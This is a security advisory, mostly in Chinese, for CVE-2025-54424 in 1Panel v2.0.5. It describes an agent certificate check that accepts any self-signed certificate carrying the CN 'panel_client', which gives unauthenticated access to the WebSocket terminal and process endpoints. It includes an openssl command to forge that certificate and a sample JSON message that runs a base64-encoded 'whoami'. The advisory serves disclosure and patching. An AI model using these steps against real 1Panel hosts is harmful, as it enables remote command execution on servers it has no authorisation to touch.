Skip to content

1Panel agent certificate verification bypass leading to arbitrary command execution

High
wanghe-fit2cloud published GHSA-8j63-96wh-wh3j Aug 1, 2025

Package

gomod 1Panel (Go)

Affected versions

e.g. <= v2.0.5

Patched versions

v2.0.6

Description

项目地址:项目地址 1Panel

官网:https://www.1panel.cn/

时间:2025 07 26

版本:1panel V2.0.5

漏洞简述

  • 首先引入1panel v2 Core端与Agent端的概念,新版本发布后,1panel增加了节点管理的功能,可以通过添加节点来控制其他的主机。
  • 而Core端与Agent端通讯所使用的https协议,在证书校验中未完全校验证书的真实性导致接口未授权。1panel中由于存在大量命令执行或高权限的接口,导致RCE。

代码审计过程

  1. 首先我们进入到Agent HTTP路由文件agent/init/router/router.go

  1. 发现Routers函数中引用Certificate函数进行了全局校验agent/middleware/certificate.go

  1. 发现Certificate函数判断了c.Request.TLS.HandshakeComplete是否进行了证书通讯

  1. 由于c.Request.TLS.HandshakeComplete的真假判断是通过agent/server/server.go代码Start函数中的tls.RequireAnyClientCert来判断的

注:此处由于使用tls.RequireAnyClientCert而不是tls.RequireAndVerifyClientCert,RequireAnyClientCert只要求客户端提供证书,不验证证书的签发CA,所以任何自签名证书都能通过TLS握手。

  1. 后续进入Certificate函数中的其他判断,只验证了证书CN字段为panel_client,未验证证书签发者。最后发现WebSocket连接可以绕过Proxy-ID验证。

  1. 项目中存在大量的websocket接口。
  • Process WebSocket 接口(根据上述问题可获取所有的进程等敏感信息)
    路由地址: /process/ws
    请求格式如下
{
  "type": "ps",           // 数据类型: ps(进程), ssh(SSH会话), net(网络连接), wget(下载进度)
  "pid": 123,             // 可选,指定进程ID进行筛选
  "name": "process_name", // 可选,根据进程名筛选
  "username": "user"      // 可选,根据用户名筛选
}

  • Terminal SSH WebSocket 接口(根据上述问题可执行任意命令)
    路由地址: /hosts/terminal
    请求格式如下
{
  "type": "cmd",
  "data": "d2hvYW1pCg=="  // "whoami" 的base64编码,记住不要忘记回车。
}

  • Container Terminal WebSocket 接口(容器执行命令接口)
    路由地址: /containers/terminal

  • File Download Process WebSocket 接口(自动推送下载进度信息)
    路由地址: /files/wget/process

攻击过程

  1. 首先生成伪造证书
    openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"

  2. 然后使用证书请求验证,如果成功连接websocket接口则存在漏洞

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2025-54424

Weaknesses

No CWEs

Credits